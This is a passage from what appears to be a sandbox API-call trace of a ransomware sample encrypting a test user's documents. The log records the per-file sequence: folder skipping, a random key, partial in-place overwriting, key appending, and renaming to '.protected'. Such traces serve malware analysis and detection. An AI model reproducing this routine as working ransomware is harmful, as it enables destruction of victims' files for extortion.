returned -1 [0091.359] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\0arOslpnViit7wH.odt") returned 69 [0091.359] StrStrIW (lpFirst="0arOslpnViit7wH.odt", lpSrch=".protected") returned 0x0 [0091.359] lstrcmpW (lpString1="0arOslpnViit7wH.odt", lpString2="RESTORE_FILES.txt") returned -1 [0091.359] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.359] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\0arOslpnViit7wH.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\0aroslpnviit7wh.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.360] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\0arOslpnViit7wH.odt") returned 69 [0091.360] StrStrW (lpFirst="0arOslpnViit7wH.odt", lpSrch=".txt") returned 0x0 [0091.360] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\0arOslpnViit7wH.odt") returned 69 [0091.360] StrStrW (lpFirst="0arOslpnViit7wH.odt", lpSrch=".rar") returned 0x0 [0091.360] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\0arOslpnViit7wH.odt") returned 69 [0091.360] StrStrW (lpFirst="0arOslpnViit7wH.odt", lpSrch=".zip") returned 0x0 [0091.360] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.360] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.360] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.361] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.361] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.361] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.361] CloseHandle (hObject=0xd4) returned 1 [0091.361] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\0arOslpnViit7wH.odt.protected") returned 79 [0091.361] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\0arOslpnViit7wH.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\0aroslpnviit7wh.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\0arOslpnViit7wH.odt.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\0aroslpnviit7wh.odt.protected")) returned 1 [0091.362] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.362] lstrcmpiW (lpString1="13xVlsU1C8IiFYf W.docx", lpString2="Windows") returned -1 [0091.362] lstrcmpiW (lpString1="13xVlsU1C8IiFYf W.docx", lpString2="Program Files") returned -1 [0091.362] lstrcmpiW (lpString1="13xVlsU1C8IiFYf W.docx", lpString2="Program Files (x86)") returned -1 [0091.362] 
lstrcmpiW (lpString1="13xVlsU1C8IiFYf W.docx", lpString2="$Recycle.bin") returned 1 [0091.362] lstrcmpiW (lpString1="13xVlsU1C8IiFYf W.docx", lpString2="System Volume Information") returned -1 [0091.362] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\13xVlsU1C8IiFYf W.docx") returned 73 [0091.362] StrStrIW (lpFirst="13xVlsU1C8IiFYf W.docx", lpSrch=".protected") returned 0x0 [0091.362] lstrcmpW (lpString1="13xVlsU1C8IiFYf W.docx", lpString2="RESTORE_FILES.txt") returned -1 [0091.362] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.362] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.362] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\13xVlsU1C8IiFYf W.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\13xvlsu1c8iifyf w.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.362] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\13xVlsU1C8IiFYf W.docx") returned 73 [0091.362] StrStrW (lpFirst="13xVlsU1C8IiFYf W.docx", lpSrch=".txt") returned 0x0 [0091.362] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\13xVlsU1C8IiFYf W.docx") returned 73 [0091.363] StrStrW (lpFirst="13xVlsU1C8IiFYf W.docx", lpSrch=".rar") returned 0x0 [0091.363] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\13xVlsU1C8IiFYf W.docx") returned 73 [0091.363] StrStrW (lpFirst="13xVlsU1C8IiFYf W.docx", lpSrch=".zip") returned 0x0 [0091.363] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, 
lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.363] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.363] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.364] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.364] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.364] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.364] CloseHandle (hObject=0xd4) returned 1 [0091.364] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\13xVlsU1C8IiFYf W.docx.protected") returned 83 [0091.365] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\13xVlsU1C8IiFYf W.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\13xvlsu1c8iifyf w.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\13xVlsU1C8IiFYf W.docx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\13xvlsu1c8iifyf w.docx.protected")) returned 1 [0091.365] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.365] lstrcmpiW (lpString1="1tG-DEIatP.pps", lpString2="Windows") 
returned -1 [0091.365] lstrcmpiW (lpString1="1tG-DEIatP.pps", lpString2="Program Files") returned -1 [0091.365] lstrcmpiW (lpString1="1tG-DEIatP.pps", lpString2="Program Files (x86)") returned -1 [0091.365] lstrcmpiW (lpString1="1tG-DEIatP.pps", lpString2="$Recycle.bin") returned 1 [0091.365] lstrcmpiW (lpString1="1tG-DEIatP.pps", lpString2="System Volume Information") returned -1 [0091.365] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\1tG-DEIatP.pps") returned 64 [0091.365] StrStrIW (lpFirst="1tG-DEIatP.pps", lpSrch=".protected") returned 0x0 [0091.365] lstrcmpW (lpString1="1tG-DEIatP.pps", lpString2="RESTORE_FILES.txt") returned -1 [0091.365] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.365] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\1tG-DEIatP.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\1tg-deiatp.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.366] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\1tG-DEIatP.pps") returned 64 [0091.366] StrStrW (lpFirst="1tG-DEIatP.pps", lpSrch=".txt") returned 0x0 [0091.366] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\1tG-DEIatP.pps") returned 64 [0091.366] StrStrW (lpFirst="1tG-DEIatP.pps", lpSrch=".rar") returned 0x0 [0091.366] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\1tG-DEIatP.pps") returned 64 [0091.366] StrStrW (lpFirst="1tG-DEIatP.pps", lpSrch=".zip") returned 0x0 [0091.366] ReadFile 
(in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.366] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.367] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.367] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.367] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.367] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.367] CloseHandle (hObject=0xd4) returned 1 [0091.368] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\1tG-DEIatP.pps.protected") returned 74 [0091.368] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\1tG-DEIatP.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\1tg-deiatp.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\1tG-DEIatP.pps.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\1tg-deiatp.pps.protected")) returned 1 [0091.368] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.368] 
lstrcmpiW (lpString1="3jKwHD1etBvoBi.ods", lpString2="Windows") returned -1 [0091.368] lstrcmpiW (lpString1="3jKwHD1etBvoBi.ods", lpString2="Program Files") returned -1 [0091.368] lstrcmpiW (lpString1="3jKwHD1etBvoBi.ods", lpString2="Program Files (x86)") returned -1 [0091.368] lstrcmpiW (lpString1="3jKwHD1etBvoBi.ods", lpString2="$Recycle.bin") returned 1 [0091.368] lstrcmpiW (lpString1="3jKwHD1etBvoBi.ods", lpString2="System Volume Information") returned -1 [0091.369] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\3jKwHD1etBvoBi.ods") returned 68 [0091.369] StrStrIW (lpFirst="3jKwHD1etBvoBi.ods", lpSrch=".protected") returned 0x0 [0091.369] lstrcmpW (lpString1="3jKwHD1etBvoBi.ods", lpString2="RESTORE_FILES.txt") returned -1 [0091.369] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.369] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\3jKwHD1etBvoBi.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\3jkwhd1etbvobi.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.369] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\3jKwHD1etBvoBi.ods") returned 68 [0091.369] StrStrW (lpFirst="3jKwHD1etBvoBi.ods", lpSrch=".txt") returned 0x0 [0091.369] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\3jKwHD1etBvoBi.ods") returned 68 [0091.369] StrStrW (lpFirst="3jKwHD1etBvoBi.ods", lpSrch=".rar") returned 0x0 [0091.369] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Documents\\Mxlov\\3jKwHD1etBvoBi.ods") returned 68 [0091.369] StrStrW (lpFirst="3jKwHD1etBvoBi.ods", lpSrch=".zip") returned 0x0 [0091.369] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.370] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.370] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.370] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.370] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.371] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.371] CloseHandle (hObject=0xd4) returned 1 [0091.371] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\3jKwHD1etBvoBi.ods.protected") returned 78 [0091.371] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\3jKwHD1etBvoBi.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\3jkwhd1etbvobi.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\3jKwHD1etBvoBi.ods.protected" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\documents\\mxlov\\3jkwhd1etbvobi.ods.protected")) returned 1 [0091.372] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.372] lstrcmpiW (lpString1="Ctip.ppt", lpString2="Windows") returned -1 [0091.372] lstrcmpiW (lpString1="Ctip.ppt", lpString2="Program Files") returned -1 [0091.372] lstrcmpiW (lpString1="Ctip.ppt", lpString2="Program Files (x86)") returned -1 [0091.372] lstrcmpiW (lpString1="Ctip.ppt", lpString2="$Recycle.bin") returned 1 [0091.372] lstrcmpiW (lpString1="Ctip.ppt", lpString2="System Volume Information") returned -1 [0091.372] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ctip.ppt") returned 58 [0091.372] StrStrIW (lpFirst="Ctip.ppt", lpSrch=".protected") returned 0x0 [0091.372] lstrcmpW (lpString1="Ctip.ppt", lpString2="RESTORE_FILES.txt") returned -1 [0091.372] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.372] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.372] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ctip.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\ctip.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.373] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ctip.ppt") returned 58 [0091.373] StrStrW (lpFirst="Ctip.ppt", lpSrch=".txt") returned 0x0 [0091.373] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ctip.ppt") returned 58 [0091.373] StrStrW (lpFirst="Ctip.ppt", lpSrch=".rar") returned 0x0 [0091.373] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ctip.ppt") returned 58 [0091.373] StrStrW (lpFirst="Ctip.ppt", lpSrch=".zip") returned 0x0 [0091.373] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.374] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.374] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.374] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.374] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.374] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.375] CloseHandle (hObject=0xd4) returned 1 [0091.375] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ctip.ppt.protected") returned 68 [0091.375] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ctip.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\ctip.ppt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\Ctip.ppt.protected" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\documents\\mxlov\\ctip.ppt.protected")) returned 1 [0091.376] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.376] lstrcmpiW (lpString1="fP3R PjQkBuI-4.pptx", lpString2="Windows") returned -1 [0091.376] lstrcmpiW (lpString1="fP3R PjQkBuI-4.pptx", lpString2="Program Files") returned -1 [0091.376] lstrcmpiW (lpString1="fP3R PjQkBuI-4.pptx", lpString2="Program Files (x86)") returned -1 [0091.376] lstrcmpiW (lpString1="fP3R PjQkBuI-4.pptx", lpString2="$Recycle.bin") returned 1 [0091.376] lstrcmpiW (lpString1="fP3R PjQkBuI-4.pptx", lpString2="System Volume Information") returned -1 [0091.376] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\fP3R PjQkBuI-4.pptx") returned 70 [0091.376] StrStrIW (lpFirst="fP3R PjQkBuI-4.pptx", lpSrch=".protected") returned 0x0 [0091.376] lstrcmpW (lpString1="fP3R PjQkBuI-4.pptx", lpString2="RESTORE_FILES.txt") returned -1 [0091.376] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.376] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.376] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\fP3R PjQkBuI-4.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\fp3r pjqkbui-4.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.377] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\fP3R PjQkBuI-4.pptx") returned 70 [0091.377] StrStrW (lpFirst="fP3R PjQkBuI-4.pptx", lpSrch=".txt") returned 0x0 [0091.377] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Documents\\Mxlov\\fP3R PjQkBuI-4.pptx") returned 70 [0091.377] StrStrW (lpFirst="fP3R PjQkBuI-4.pptx", lpSrch=".rar") returned 0x0 [0091.377] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\fP3R PjQkBuI-4.pptx") returned 70 [0091.377] StrStrW (lpFirst="fP3R PjQkBuI-4.pptx", lpSrch=".zip") returned 0x0 [0091.377] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.378] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.378] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.378] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.378] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.378] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.378] CloseHandle (hObject=0xd4) returned 1 [0091.379] 